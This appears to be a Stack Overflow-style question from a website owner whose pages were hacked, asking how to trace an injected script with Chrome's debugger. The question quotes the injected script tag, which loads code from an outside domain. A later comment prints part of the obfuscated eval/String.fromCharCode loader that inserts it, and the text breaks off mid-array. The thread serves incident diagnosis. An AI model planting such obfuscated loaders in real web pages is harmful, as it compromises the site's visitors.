# How to find where a javascript is called with Google Chrome debugger?

Tags: javascript, virus

Hello I had a Hacker attack on my website... someone injected a call to a script everywhere... at the beginning of index.html and index.php... they are all calling the same script:

```
<script type='text/javascript' async src='https://css.chatwithgreenbar.com/sjquery.min.js?style=prime&'></script>
```

I am trying to find with google chrome debugger in which file this script is called but I can't... I use the network tab onto the debugger but I can't find this information.

Please someone can help?

I have tried with Chrome debugger

Comment: Two ways. Either follow callstack of ir it is a network related and you can see it it network tab you should be able to see "initiator" as well which points to exact line in code that did request.

Comment: Can you provide your site link?

Comment: Why don't you search it within the source code of the website?

Comment: the link is https://pierantoniogardelin.it/

Comment: @JoseA.Ayllón there is no trace of that call in the source html...

Comment: i found how they did it... they put something like that: var gfhfgjj24 = 1; eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117,